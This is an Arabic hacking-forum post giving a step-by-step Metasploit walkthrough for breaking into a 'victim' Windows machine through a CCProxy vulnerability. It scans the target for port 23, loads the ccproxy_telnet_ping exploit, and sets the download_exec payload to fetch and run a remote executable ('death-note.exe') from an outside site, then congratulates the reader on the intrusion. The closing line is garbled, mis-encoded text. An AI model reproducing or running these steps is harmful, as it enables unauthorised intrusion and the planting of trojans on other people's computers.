شرح إستغلال ثغره سي بروكسي < اخترآق المسستهـدف !

[mayck]

شـرح إستغلآل ثغرهـ سسي بـروكسسي لإخترآق الجهـآز المسستهدف [!!] .....|
ـأول ششي نسـوي سكآن علـى الإيبي ونشـوف بورت البرنـآمج مفـتوح فـيه ولآلآ:
بنسوي سكان بأداه {auxiliary}
بـورت الـسي بروكسي الإفترآضضي هو 23
[+]show auxiliary


scanner/portscan/tcp[+]


use scanner/portscan/tcp[+]


show options[+]


Ports :لتحديد البورتات الي بنفحصهـآ
[+]rhost :ايبي المستهدف [الضحيه]ض1

set ports 23-23


set RHOST 192.168.1.2~ مثآل فقـط على آيبي الضـحيه !!

run
tcp open 192.168.1.2:23

البورت مفتوح ,حلو الحين نسوي
[+] show exploits

ثـم نختـآر
windows/proxy/ccproxy_telnet_ping[+]

ثـم
use windows/proxy/ccproxy_telnet_ping
هذه الصورة تم اعادة تحجيمها اضغط على الشريط الاصفر للحصول على الحجم الاصلي حجم الصورة الاصلي هو 646x34 ومساحتها 1 كيلو بايت


!! ملاحظـه :طبعاً يمـديك إختـرآق الجهـآز ببآتش
مـن خلآل الـpayloads
طبعاً لو تبي تظهـر البآيلودز كلهم إكتب show payloads ^_+

, وإذا تبي تسوي البآيلود الفلآني تحط use payload
o_O
إسم البآيلود الي يخلينا نرفع البآتشش
widows/download_exec

[+]set payload windows/download_exec

ـأوكي الحين بعد ماحطينا البآيلود حق الرفـع نضغـط
[+]show options
هذه الصورة تم اعادة تحجيمها اضغط على الشريط الاصفر للحصول على الحجم الاصلي حجم الصورة الاصلي هو 688x246 ومساحتها 23 كيلو بايت

مثل مآقلنا
rhost : الضحيـه [الهدف] ض1
ports : 23 االبورت الي هو حق السي بروكسي
url : رآببط بآآتششششك المبـآآآششششر
ـأوكي الحين
set RHOST 192.168.1.2 ؛ نحط ايبي الضحـيه

نضغط إنتر , والحين نحط البآآتشش
set Url www.sa-hacker.com/death-note.exe

ثم show options

هذه الصورة تم اعادة تحجيمها اضغط على الشريط الاصفر للحصول على الحجم الاصلي حجم الصورة الاصلي هو 702x248 ومساحتها 7 كيلو بايت

طلع مـكتوب Yes
تمـآم ^^
مبـرووك عليك الإخترآق . لكن لاتنسى عشآن تشتغل الثغره تمام التمام تكت فـ الإخير
exploit

المصدر: :: vBspiders Professional Network ::

---

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC avp Ysjyghg eyvi sd fv,;sd < hojvNr hglssjiJ]t !